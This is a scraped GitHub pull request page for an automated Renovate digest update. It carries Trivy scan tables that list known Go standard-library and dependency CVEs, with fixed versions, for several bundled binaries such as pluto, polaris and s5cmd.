CVE-2025-61728 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61730 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
No Misconfigurations found
usr/local/bin/pluto
4 known vulnerabilities found (CRITICAL: 1 HIGH: 3 MEDIUM: 0 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.5 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61730 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
No Misconfigurations found
usr/local/bin/polaris
4 known vulnerabilities found (CRITICAL: 1 HIGH: 3 MEDIUM: 0 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.5 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61730 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
No Misconfigurations found
usr/local/bin/s5cmd
25 known vulnerabilities found (HIGH: 6 MEDIUM: 18 LOW: 0 CRITICAL: 1)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.22.10 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-47907 | HIGH | v1.22.10 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.22.10 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.22.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.22.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.22.10 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.22.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2024-45336 | MEDIUM | v1.22.10 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2024-45341 | MEDIUM | v1.22.10 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.22.10 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.22.10 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.22.10 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.22.10 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.22.10 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.22.10 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.22.10 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.22.10 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.22.10 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.22.10 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.22.10 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.22.10 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.22.10 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.22.10 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.22.10 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.22.10 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/trivy
2 known vulnerabilities found (MEDIUM: 1 LOW: 1 CRITICAL: 0 HIGH: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
github.com/cloudflare/circl |
CVE-2026-1229 | LOW | v1.6.1 | 1.6.3 |
github.com/go-git/go-git/v5 |
CVE-2026-25934 | MEDIUM | v5.16.4 | 5.16.5 |
No Misconfigurations found
usr/local/bin/yq
No Vulnerabilities found
No Misconfigurations found
df59a6b to
fb248f8
Compare
23d6e3c
fb248f8 to
23d6e3c
Compare
…er digest to 204990d
d228bc3
23d6e3c to
d228bc3
Compare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.

This PR contains the following updates:
79f2c2c→204990dConfiguration
📅 Schedule: Branch creation - Between 12:00 AM and 03:59 AM, only on Monday ( * 0-3 * * 1 ) (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Enabled.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.